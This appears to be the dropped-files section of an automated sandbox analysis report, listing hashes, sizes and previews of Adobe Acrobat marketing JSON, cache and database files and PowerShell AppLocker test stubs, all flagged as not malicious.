                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):292
                                                                                      Entropy (8bit):5.3078492957553625
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJfQ1rPeUkwRe9:YvXKX1fmcgc5GY16Ukee9
                                                                                      MD5:BAB31D7273062CF5E64F77664BDB7898
                                                                                      SHA1:F1DE1EB3D0760114F74984B8C67BED1901AAEFD5
                                                                                      SHA-256:BDB7C7EC519519222B5546B2749D014C1F9FD6B1F933758AD5BBB7ED29579F13
                                                                                      SHA-512:B26DD2A6AC55760E4491745C5C6EC799897ED574A7A9FA7A300F07428C67F12B4550CE3E5A889ECB2F5FC33F1699D5C91DC1FBA921F571F5944C01C8B5DE8337
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):289
                                                                                      Entropy (8bit):5.314335651955779
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJfFldPeUkwRe9:YvXKX1fmcgc5Gz8Ukee9
                                                                                      MD5:73E91259E23A28272B2C49594544C535
                                                                                      SHA1:81FFE15014ACC6C1A21F3E53F7352B7BACF3000B
                                                                                      SHA-256:7835651E4661B80F1A883DEACF229D5E701DAE922083CBA4382382D602891DB1
                                                                                      SHA-512:C330F8DD16EFFD0496BAE7E20F4042852CB5864D014508DCD084778034804A05C9213D2C728AED7C4B5768A7DCC112828CF1212CB245438A77E2F9A7489E9D1E
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):295
                                                                                      Entropy (8bit):5.330771215637848
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJfzdPeUkwRe9:YvXKX1fmcgc5Gb8Ukee9
                                                                                      MD5:1FD5A8A3FA8204BA8C320949C8CA8FD4
                                                                                      SHA1:443B832D5C99D327EFB440B23953CCD484EF1E1B
                                                                                      SHA-256:4D3122C19A66E39D94FFD5C91C7D115D5ED87E8244AC26C82F13EE9CB63EFA32
                                                                                      SHA-512:87BDFA91A381B886354E722FBCAE127CD6714E1A23016F93674E7E0D25E5FE6AF3077D5F3E109819143A60E795F08913F59C90D461CA4808478A479166DB8C07
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):289
                                                                                      Entropy (8bit):5.3119292718131845
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJfYdPeUkwRe9:YvXKX1fmcgc5Gg8Ukee9
                                                                                      MD5:B28B4F2956E91C83B015316244C8371E
                                                                                      SHA1:8E90C2B8A34301612600A4A815DEC90E4242FAFD
                                                                                      SHA-256:5832694675EF188AE83A4669CA301A583716B619F2EE1B817E8B859342D7ED7E
                                                                                      SHA-512:0E808828598B169F1B2E3F8FAA48494691F4978666009D6635FE328E47035FED048D37209D0B840D0C09A67CFCDC3B387EB5CF376EDF3D024BCA1856452FAB7E
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):284
                                                                                      Entropy (8bit):5.297871965494094
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJf+dPeUkwRe9:YvXKX1fmcgc5G28Ukee9
                                                                                      MD5:A384B507009B5964868E6A4626584330
                                                                                      SHA1:B167CB25583253C72AA68078FF310A68EF5EA57D
                                                                                      SHA-256:80BA5EC4E10C2647762A4A565A910A7CE37A17197DA20943EB7486F68ED4AFCE
                                                                                      SHA-512:76A4BC6A6B951F9784654487BCB7F117A4EDA86F406F35166B0D32EF459793201A5C14C138AC70A01DF8B2AF6D41F49F92D65291DE7F1BDD15E174109B81BCA0
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):291
                                                                                      Entropy (8bit):5.29539438136462
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJfbPtdPeUkwRe9:YvXKX1fmcgc5GDV8Ukee9
                                                                                      MD5:D7B2D3747703B803FB8172C69504AC7E
                                                                                      SHA1:429130B7A9A20D2BD59D84A4D6806193BF475355
                                                                                      SHA-256:31A7234A8E4801368EBE86605D8463B55A543F0DA0031D6A7FBD7FB6F617883A
                                                                                      SHA-512:43BE61CB92C003539C304A8C4427A93A978672F7C7FB2DB4FFBC29DFCE6E4414F4B9B7752BBE14EAEB1C7AE70669631710170E1B97219F91136F6EBED3AF45A5
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):287
                                                                                      Entropy (8bit):5.299236686201587
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJf21rPeUkwRe9:YvXKX1fmcgc5G+16Ukee9
                                                                                      MD5:A6250AD9D39315E9B5F2992DAECB8522
                                                                                      SHA1:82172A345F0614F9D04B2CD613675A2992A27301
                                                                                      SHA-256:690C77085CC4525F82AEFCAE0FDE73E283B40113FFD67B9459BB7C8AF774FC69
                                                                                      SHA-512:3EF5857B9875728C2C68135371204F0A5C4AE170367ABDCBD1DFE1806FA5D42D7694BE03D32B3C92C44DCC4F3302F73255F2BF5E1FED6A5AF46FD9E0914657AC
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):1090
                                                                                      Entropy (8bit):5.67008342908652
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Yv6X1fbgamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSTr:YvbBgkDMUJUAh8cvMX
                                                                                      MD5:D287D28AFCE409731876C3AECE8E27A8
                                                                                      SHA1:2109D464B6CF5590851E34C854E9EB99521D2468
                                                                                      SHA-256:05DE2681C2C7131E14F84CF603A4D69EFA4364B0670F18A828BDFF61311FA095
                                                                                      SHA-512:AB5D4F723C249B8687B8172D0A30B0FB72967A01B92DB4970A94A1D2D8331E304FECECFE46BB1ED215ED3BB4BDDB80F1A021C869DF6BA830E33B50534B2998D0
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):286
                                                                                      Entropy (8bit):5.275281920399625
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJfshHHrPeUkwRe9:YvXKX1fmcgc5GUUUkee9
                                                                                      MD5:BA5A25AE7D1F6E222586014F3DEEC331
                                                                                      SHA1:A33DCB369DA9050F0BA737EAFD0419A45879661C
                                                                                      SHA-256:542D539B0F3B225252CB4D703E526E51F41FB302A8C6E256D1EAAF7ADB30EA1D
                                                                                      SHA-512:BE501D81CDC2A32A58D133F3626DBE03A44D6A73BB0330DA792B7699993AF29EE6E4C4E03E3FF886871733E22EE49C3E7C70B8EF4267F0FB2916509262403434
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):282
                                                                                      Entropy (8bit):5.282882633097287
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJTqgFCrPeUkwRe9:YvXKX1fmcgc5GTq16Ukee9
                                                                                      MD5:47AAACBAF3BB201DFB948309537370DF
                                                                                      SHA1:D3FA6A1D973FD15A0A76B7E2FFB24BB7ED4B71CF
                                                                                      SHA-256:BD7F2E10D01FAD24174402751E47B993AFA3D28F04104CFFB861FD4E1F28B573
                                                                                      SHA-512:20596888C4C3A5EF61C77D4B67D47A629CCEAB8E4935BD45469536758531772E5F46144146D6A1970677D80D0A54D54E996A179109FAAA7ECB76268BC5110E04
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4
                                                                                      Entropy (8bit):0.8112781244591328
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:e:e
                                                                                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                      Malicious:false
                                                                                      Preview:....

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):2814
                                                                                      Entropy (8bit):5.134392305323593
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Y8kzdaU4aySzRdEWI3alMOUDDj1/j0StGC+J12Sy0CP2LS1h/CANpcOc8G5xx92/:YrHnUT1LA939CP/JlcOHGl92xt
                                                                                      MD5:FC4A6DFC681849BE9C0DADC95E37FAD4
                                                                                      SHA1:AEE77C61B19E1433153837B1E06EE06A9277FAAD
                                                                                      SHA-256:DACA785412069ED871E737DA92CF858D4D5AC28DC7755074F9BC34E094B2DD9C
                                                                                      SHA-512:8F0D9E13109BD65E3FFA18576DF0646DBE1D1E69AFCA0E677776B46115C0358FBA447872DF7DD50DF590D8B31B26525D2E8D29CE9AD895053E9AEFB7BB46F279
                                                                                      Malicious:false
                                                                                      Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"8720bcb9a43ad49ba952249e8d00dad2","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734608894000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"dfe6af3190c3905c04962657cc6ca492","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734608894000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"b52f82eaf013c422a1ba952ec4d6f961","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734608894000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"804c638325da2697d878cf23bbcf78a6","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734608894000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"2812f3631b50d860a8673b07a1a47be1","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1734608894000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"98eb034af6042a18acce4e023d7e523d","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":2

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
                                                                                      Category:dropped
                                                                                      Size (bytes):12288
                                                                                      Entropy (8bit):1.1452120183851335
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TLhx/XYKQvGJF7urs3ETRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudC:TFl2GL7ms3AXc+XcGNFlRYIX2v3k2m
                                                                                      MD5:ADBDBCE5900F2CF461E09F14E486C6BA
                                                                                      SHA1:88AD3352AF06E8EAF71C13D590F4ABE54A0D6B40
                                                                                      SHA-256:D73D5F7B1CAC38310390D33E85A37F4959850075A185DFC2808A80B143909BC6
                                                                                      SHA-512:73A4710F47E446018C45A3C6ECB925260DEF4AF2A498EB8DF1EF8609EA5ED5A0A32E9F4B4BF480A7AE9744E0C03B538014116FD855F1B99DB5EC938DD8641DF2
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite Rollback Journal
                                                                                      Category:dropped
                                                                                      Size (bytes):8720
                                                                                      Entropy (8bit):1.5495171159034844
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:7+tBWETUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxLnqLxx/r:7MBW3Xc+XcGNFlRYIX2vWnqVl2GL7msd
                                                                                      MD5:822BE47C1A761E200727C24C5715A810
                                                                                      SHA1:C1896CF4405887F57DD8ACF6D52D73CB841F02F3
                                                                                      SHA-256:4AEA5DF9C126705552CE22A36F97A0A8795418B139D0BF5EF19FC9B142BEF695
                                                                                      SHA-512:2543946960DC2DA988B82D0367A9619B92D421822BF2000F271E7C3A6FD95E11D0214DF1CC684E922E08956D5424AE1C558E27D07EFDC2606FA9C5BFD1BC35E3
                                                                                      Malicious:false
                                                                                      Preview:.... .c.......tc..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................b..b.b.b.b.b.b.b.b.b.b.b.b.b..................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):66726
                                                                                      Entropy (8bit):5.392739213842091
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RNOpblrU6TBH44ADKZEgzTmk3mQck2C351zooRYH/Wg4RrYyu:6a6TZ44ADEvmk3Zck5tYH+5FK
                                                                                      MD5:DB14CE893137DDB5B96997E1FECDD15F
                                                                                      SHA1:2477CCFCBA6A316AE5E99D22AC58D530D524067B
                                                                                      SHA-256:4A12D58EC73A35E2758BFBE4D21A262B7543F183C96F046B6F06AFDD50CEB544
                                                                                      SHA-512:3CB369956A90BD325D7F4396E5332E39B05C6DBCD9112B57EED452734CC09DA0623F014678DBEA16ECA00DA358F0CEEFF01586DA4CD8263C47C8F5AFDAE2E59F
                                                                                      Malicious:false
                                                                                      Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):64
                                                                                      Entropy (8bit):1.1940658735648508
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Nlllul79Yll//Z:NllUGl
                                                                                      MD5:851849E23E67E904A88407CDB0964345
                                                                                      SHA1:4B33734D0E176A208FE58C3EB552CA42A9F6ECD9
                                                                                      SHA-256:CCDB092D6A7666749275AC8E7AFBCB9CC36BA225054ABFD6F8C94D152FB65BCB
                                                                                      SHA-512:030ACC5F1C6C53410065D6DD7BD8FB63BF9A5B4CCD31AC05A35A4D061F595954FECCF9B93EC9FE195269018687EA10F963B7C5B82CEA305304B7781E1B23CAAA
                                                                                      Malicious:false
                                                                                      Preview:@...e.................................j.}............@..........

                                                                                      C:\Users\user\AppData\Local\Temp\MSI6ef61.LOG

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):246
                                                                                      Entropy (8bit):3.5197430193686525
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8mUlAQMH:Qw946cPbiOxDlbYnuRK5
                                                                                      MD5:D6D85D561CEB89AE278F1FD424D104D7
                                                                                      SHA1:E87E94E4A4C9CA792951A420718C462F43BF506F
                                                                                      SHA-256:24F3B2782D43AD7A0F532E932C398131F5DFDE6F871F90E9CE4C5B3BCC2C2756
                                                                                      SHA-512:1AA87BDC7FD4E4219D398CA6DBCB753BD2E1B6F79928607FF259C3C23682360AC8F76213219DEFF999C0B5267B73BF9171AC715CA0053E5E693A8B9B8A0E58FE
                                                                                      Malicious:false
                                                                                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.9./.1.2./.2.0.2.4. . .0.6.:.4.8.:.1.1. .=.=.=.....

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xgvh2kd.33d.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2okm2zqb.nqi.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dhhesacp.pmd.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecthr1o2.hsk.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
